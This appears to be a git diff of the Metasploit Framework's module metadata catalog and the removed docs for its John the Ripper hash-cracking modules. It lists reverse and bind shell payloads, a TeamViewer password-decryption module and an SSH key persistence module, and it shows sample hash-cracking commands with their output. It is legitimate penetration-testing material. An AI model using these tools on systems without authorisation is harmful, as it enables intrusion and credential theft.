@@ -144427,7 +144609,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/bind_netcat_gaping_ipv6",
@@ -144494,7 +144676,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/bind_perl.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/bind_perl",
@@ -144528,7 +144710,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/bind_perl_ipv6",
@@ -144549,7 +144731,7 @@
     "disclosure_date": null,
     "type": "payload",
     "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
     ],
     "description": "Continually listen for a connection and spawn a command shell via R",
     "references": [
@@ -144561,7 +144743,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-08-28 05:30:30 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
     "path": "/modules/payloads/singles/cmd/unix/bind_r.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/bind_r",
@@ -144594,7 +144776,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/bind_ruby.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/bind_ruby",
@@ -144627,7 +144809,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/bind_ruby_ipv6",
@@ -144660,7 +144842,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-08-15 18:10:44 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/bind_socat_udp.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/bind_socat_udp",
@@ -144760,7 +144942,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/generic.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/generic",
@@ -144892,7 +145074,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse",
@@ -144960,7 +145142,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2018-07-10 18:34:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse_bash.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse_bash",
@@ -144981,7 +145163,7 @@
     "disclosure_date": null,
     "type": "payload",
     "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
     ],
     "description": "Creates an interactive shell via mkfifo and telnet.\n        This method works on Debian and other systems compiled\n        without /dev/tcp support. This module uses the '-z'\n        option included on some systems to encrypt using SSL.",
     "references": [
@@ -144993,7 +145175,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2018-05-15 20:50:30 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse_bash_telnet_ssl",
@@ -145027,7 +145209,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-05-24 16:33:44 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse_bash_udp.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse_bash_udp",
@@ -145129,7 +145311,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse_lua.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse_lua",
@@ -145197,7 +145379,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2018-08-23 18:00:02 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse_netcat.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse_netcat",
@@ -145230,7 +145412,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2018-08-23 18:00:02 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse_netcat_gaping",
@@ -145296,7 +145478,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse_openssl.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse_openssl",
@@ -145329,7 +145511,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse_perl.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse_perl",
@@ -145350,7 +145532,7 @@
     "disclosure_date": null,
     "type": "payload",
     "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
     ],
     "description": "Creates an interactive shell via perl, uses SSL",
     "references": [
@@ -145362,7 +145544,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-21 09:17:51 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse_perl_ssl",
@@ -145383,7 +145565,7 @@
     "disclosure_date": null,
     "type": "payload",
     "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
     ],
     "description": "Creates an interactive shell via php, uses SSL",
     "references": [
@@ -145395,7 +145577,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2018-02-19 15:49:46 +0000",
+    "mod_time": "2020-02-21 09:17:51 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse_php_ssl",
@@ -145428,7 +145610,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-01-10 19:19:14 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse_python.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse_python",
@@ -145449,7 +145631,7 @@
     "disclosure_date": null,
     "type": "payload",
     "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
     ],
     "description": "Creates an interactive shell via python, uses SSL, encodes with base64 by design.",
     "references": [
@@ -145461,7 +145643,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse_python_ssl",
@@ -145482,7 +145664,7 @@
     "disclosure_date": null,
     "type": "payload",
     "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
     ],
     "description": "Connect back and create a command shell via R",
     "references": [
@@ -145494,7 +145676,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-08-28 05:30:30 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse_r.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse_r",
@@ -145527,7 +145709,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse_ruby.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse_ruby",
@@ -145548,7 +145730,7 @@
     "disclosure_date": null,
     "type": "payload",
     "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
     ],
     "description": "Connect back and create a command shell via Ruby, uses SSL",
     "references": [
@@ -145560,7 +145742,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse_ruby_ssl",
@@ -145593,7 +145775,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-08-15 18:10:44 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse_socat_udp.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse_socat_udp",
@@ -145604,6 +145786,40 @@
     },
     "needs_cleanup": false
   },
+  "payload_cmd/unix/reverse_ssh": {
+    "name": "Unix Command Shell, Reverse TCP SSH",
+    "fullname": "payload/cmd/unix/reverse_ssh",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "RageLtMan <rageltman@sempervictus>",
+      "hirura"
+    ],
+    "description": "Connect back and create a command shell via SSH",
+    "references": [
+
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-02-18 15:21:46 +0000",
+    "path": "/modules/payloads/singles/cmd/unix/reverse_ssh.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/unix/reverse_ssh",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
   "payload_cmd/unix/reverse_ssl_double_telnet": {
     "name": "Unix Command Shell, Double Reverse TCP SSL (telnet)",
     "fullname": "payload/cmd/unix/reverse_ssl_double_telnet",
@@ -145615,7 +145831,7 @@
     "type": "payload",
     "author": [
       "hdm <x@hdm.io>",
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
     ],
     "description": "Creates an interactive shell through two inbound connections, encrypts using SSL via \"-z\" option",
     "references": [
@@ -145627,7 +145843,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-21 09:17:51 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse_ssl_double_telnet",
@@ -146133,7 +146349,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-21 06:53:37 +0000",
     "path": "/modules/payloads/singles/cmd/windows/reverse_powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/reverse_powershell",
@@ -153068,7 +153284,7 @@
     "disclosure_date": null,
     "type": "payload",
     "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
     ],
     "description": "Creates an interactive shell via python, uses SSL, encodes with base64 by design.",
     "references": [
@@ -153080,7 +153296,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
     "path": "/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb",
     "is_install_path": true,
     "ref_name": "python/shell_reverse_tcp_ssl",
@@ -153134,7 +153350,7 @@
     "disclosure_date": null,
     "type": "payload",
     "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
     ],
     "description": "Continually listen for a connection and spawn a command shell via R",
     "references": [
@@ -153146,7 +153362,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-08-28 05:30:30 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
     "path": "/modules/payloads/singles/r/shell_bind_tcp.rb",
     "is_install_path": true,
     "ref_name": "r/shell_bind_tcp",
@@ -153167,7 +153383,7 @@
     "disclosure_date": null,
     "type": "payload",
     "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
     ],
     "description": "Connect back and create a command shell via R",
     "references": [
@@ -153179,7 +153395,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-08-28 05:30:30 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
     "path": "/modules/payloads/singles/r/shell_reverse_tcp.rb",
     "is_install_path": true,
     "ref_name": "r/shell_reverse_tcp",
@@ -153368,7 +153584,7 @@
     "disclosure_date": null,
     "type": "payload",
     "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
     ],
     "description": "Connect back and create a command shell via Ruby, uses SSL",
     "references": [
@@ -153380,7 +153596,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
     "path": "/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb",
     "is_install_path": true,
     "ref_name": "ruby/shell_reverse_tcp_ssl",
@@ -163269,7 +163485,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-15 14:35:38 +0000",
     "path": "/modules/post/linux/gather/enum_system.rb",
     "is_install_path": true,
     "ref_name": "linux/gather/enum_system",
@@ -166347,7 +166563,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-04-24 05:06:20 +0000",
+    "mod_time": "2020-02-13 16:17:33 +0000",
     "path": "/modules/post/osx/gather/password_prompt_spoof.rb",
     "is_install_path": true,
     "ref_name": "osx/gather/password_prompt_spoof",
@@ -168535,6 +168751,40 @@
     },
     "needs_cleanup": null
   },
+  "post_windows/gather/credentials/teamviewer_passwords": {
+    "name": "Windows Gather TeamViewer Passwords",
+    "fullname": "post/windows/gather/credentials/teamviewer_passwords",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Nic Losby <blurbdust@gmail.com>"
+    ],
+    "description": "This module will find and decrypt stored TeamViewer passwords",
+    "references": [
+      "CVE-2019-18988",
+      "URL-https://whynotsecurity.com/blog/teamviewer/"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-02-07 10:07:41 +0000",
+    "path": "/modules/post/windows/gather/credentials/teamviewer_passwords.rb",
+    "is_install_path": true,
+    "ref_name": "windows/gather/credentials/teamviewer_passwords",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "post_windows/gather/credentials/tortoisesvn": {
     "name": "Windows Gather TortoiseSVN Saved Password Extraction",
     "fullname": "post/windows/gather/credentials/tortoisesvn",
@@ -169785,7 +170035,7 @@
       "zeroSteiner <zeroSteiner@gmail.com>",
       "mubix <mubix@hak5.org>"
     ],
-    "description": "This module will attempt to enumerate which patches are applied to a windows system\n          based on the result of the WMI query: SELECT HotFixID FROM Win32_QuickFixEngineering",
+    "description": "This module will attempt to enumerate which patches are applied to a windows system\n          based on the result of the WMI query: SELECT HotFixID FROM Win32_QuickFixEngineering.",
     "references": [
       "URL-http://msdn.microsoft.com/en-us/library/aa394391(v=vs.85).aspx"
     ],
@@ -169795,7 +170045,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-12-14 15:58:45 +0000",
+    "mod_time": "2020-01-14 20:49:39 +0000",
     "path": "/modules/post/windows/gather/enum_patches.rb",
     "is_install_path": true,
     "ref_name": "windows/gather/enum_patches",
@@ -171284,7 +171534,7 @@
     "disclosure_date": null,
     "type": "post",
     "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
     ],
     "description": "This module will download a file by importing urlmon via railgun.\n        The user may also choose to execute the file with arguments via exec_string.",
     "references": [
@@ -171296,7 +171546,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
     "path": "/modules/post/windows/manage/download_exec.rb",
     "is_install_path": true,
     "ref_name": "windows/manage/download_exec",
@@ -171417,7 +171667,7 @@
     "type": "post",
     "author": [
       "Nicholas Nam (nick <Nicholas Nam (nick@executionflow.org)>",
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
     ],
     "description": "This module will execute a powershell script in a meterpreter session.\n        The user may also enter text substitutions to be made in memory before execution.\n        Setting VERBOSE to true will output both the script prior to execution and the results.",
     "references": [
@@ -171429,7 +171679,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
     "path": "/modules/post/windows/manage/exec_powershell.rb",
     "is_install_path": true,
     "ref_name": "windows/manage/exec_powershell",
@@ -171954,7 +172204,7 @@
     "type": "post",
     "author": [
       "Nicholas Nam (nick <Nicholas Nam (nick@executionflow.org)>",
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
     ],
     "description": "This module will download and execute a PowerShell script over a meterpreter session.\n        The user may also enter text substitutions to be made in memory before execution.\n        Setting VERBOSE to true will output both the script prior to execution and the results.",
     "references": [
@@ -171966,7 +172216,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
     "path": "/modules/post/windows/manage/powershell/exec_powershell.rb",
     "is_install_path": true,
     "ref_name": "windows/manage/powershell/exec_powershell",
@@ -172121,9 +172371,10 @@
     "disclosure_date": null,
     "type": "post",
     "author": [
-      "Ben Campbell <eat_meatballs@hotmail.co.uk>"
+      "Ben Campbell <eat_meatballs@hotmail.co.uk>",
+      "b4rtik"
     ],
-    "description": "This module will inject into the memory of a process a specified Reflective DLL.",
+    "description": "This module will inject a specified reflective DLL into the memory of a\n        process, new or existing. If arguments are specified, they are passed to\n        the DllMain entry point as the lpvReserved (3rd) parameter. To read\n        output from the injected process, set PID to zero and WAIT to non-zero.\n        Make sure the architecture of the DLL matches the target process.",
     "references": [
       "URL-https://github.com/stephenfewer/ReflectiveDLLInjection"
     ],
@@ -172133,7 +172384,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-26 11:31:34 +0000",
     "path": "/modules/post/windows/manage/reflective_dll_inject.rb",
     "is_install_path": true,
     "ref_name": "windows/manage/reflective_dll_inject",
@@ -172442,6 +172693,39 @@
     },
     "needs_cleanup": null
   },
+  "post_windows/manage/sshkey_persistence": {
+    "name": "SSH Key Persistence",
+    "fullname": "post/windows/manage/sshkey_persistence",
+    "aliases": [
+
+    ],
+    "rank": 400,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Dean Welch <dean_welch@rapid7.com>"
+    ],
+    "description": "This module will add an SSH key to a specified user (or all), to allow\n          remote login via SSH at any time.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-02-05 16:21:38 +0000",
+    "path": "/modules/post/windows/manage/sshkey_persistence.rb",
+    "is_install_path": true,
+    "ref_name": "windows/manage/sshkey_persistence",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "post_windows/manage/sticky_keys": {
     "name": "Sticky Keys Persistance Module",
     "fullname": "post/windows/manage/sticky_keys",

documentation/modules/auxiliary/analyze/jtr_aix.md

@@ -1,141 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode AIX 
-  based password hashes, such as:
-
-  * `DES` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-## Verification Steps
-
-  1. Have at least one user with a `des` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_aix```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:des_password hash:rEK1ecacw.7.c jtr:des
-creds add user:des_passphrase hash:qiyh4XPJGsOZ2MEAyLkfWqeQ jtr:des
-```
-
-Crack them:
-
-```
-[*] Hashes Written out to /tmp/hashes_tmp20190211-5021-1p3x0lx
-[*] Wordlist file written out to /tmp/jtrtmp20190211-5021-66w3u0
-[*] Cracking descrypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:00 DONE (2019-02-11 19:29) 0g/s 4206Kp/s 4206Kc/s 4206KC/s scandal..vagrant
-Session completed
-[*] Cracking descrypt hashes in single mode...
-Using default input encoding: UTF-8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:05 DONE (2019-02-11 19:29) 0g/s 6681Kp/s 6681Kc/s 6681KC/s qt1902..tude1900
-Session completed
-[*] Cracking descrypt hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-Will run 8 OpenMP threads
-Warning: MaxLen = 20 is too large for the current hash type, reduced to 8
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:05 DONE (2019-02-11 19:29) 0g/s 21083Kp/s 21083Kc/s 21083KC/s 73602400..73673952
-Session completed
-[*] Cracked Passwords this run:
-[+] des_password:password
-[+] des_passphrase:????????se
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_aix) > creds
-Credentials
-===========
-
-host  origin  service  public          private                   realm  private_type        JtR Format
-----  ------  -------  ------          -------                   -----  ------------        ----------
-                       des_passphrase  ????????se                       Password            
-                       des_passphrase  qiyh4XPJGsOZ2MEAyLkfWqeQ         Nonreplayable hash  des
-                       des_password    rEK1ecacw.7.c                    Nonreplayable hash  des
-                       des_password    password                         Password            
-
-```

documentation/modules/auxiliary/analyze/jtr_linux.md

@@ -1,176 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Linux
-  based password hashes, such as:
-
-  * `DES` based passwords
-  * `MD5` based passwords
-  * `BSDi` based passwords
-  * With `crypt` set to `true`:
-    * `bf`, `bcrypt`, or `blowfish` based passwords
-    * `SHA256` based passwords
-    * `SHA512` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-  The definition of `crypt` according to JTR and waht algorithms it decodes can be found
-  [here](https://github.com/magnumripper/JohnTheRipper/blob/ae24a410baac45bb36884d793c429adeb7197336/src/c3_fmt.c#L731)
-
-## Verification Steps
-
-  1. Have at least one user with an `des`, `md5`, `bsdi`, `crypt`, `blowfish`, `sha512`, or `sha256` password hash in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_linux```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CRYPT**
-
-   Include `blowfish` and `SHA`(256/512) passwords.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:des_password hash:rEK1ecacw.7.c jtr:des
-creds add user:md5_password hash:$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/ jtr:md5
-creds add user:bsdi_password hash:_J9..K0AyUubDrfOgO4s jtr:bsdi
-creds add user:sha256_password hash:$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5 jtr:sha256,crypt
